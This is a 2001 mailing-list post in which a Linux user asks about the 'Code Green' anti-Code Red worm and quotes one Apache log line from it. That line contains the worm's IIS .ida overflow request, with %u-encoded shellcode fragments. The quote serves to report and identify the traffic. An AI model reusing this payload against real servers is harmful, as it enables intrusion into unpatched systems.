A buddy has started seeing something in his Apache logs calling itself the
Code Green. It's apparently an anti-Code Red worm that is designed to patch
the site that just tried to Code Red you. Yes, it's a reactive agent.
A log snippet:
[06/Sep/2001:20:16:10 -0400] "GET /default.ida?Code_Green_<I_
like_the_colour-_-><AntiCodeRed-CodeRedIII-IDQ_Patcher>_V1.0_beta_written_by_'De
r_HexXer'-Wuerzburg_Germany-_is_dedicated_to_my_sisterli_'Doro'.Save_Whale_and_v
isit_<www.buhaboard.de>_and_<www.buha-security.de>%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u
531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 282 "-" "-"
The site www.buhaboard.de is German and Babel don't care for it too much.
Anyone got more details?
--
Douglas J. Hunley ([EMAIL PROTECTED]) - Linux User #174778
Admin: http://hunley.homeip.net/ Admin: http://linux.nf/
Brainbench Linux Administration Certified
~~ Now offering Linux admin services for the home user ~~
I tried to drown my sorrows, but the suckers learned how to swim.
_______________________________________________
http://linux.nf -- [EMAIL PROTECTED]
Archives, Subscribe, Unsubscribe, Digest, Etc
->http://linux.nf/mailman/listinfo/linux-users
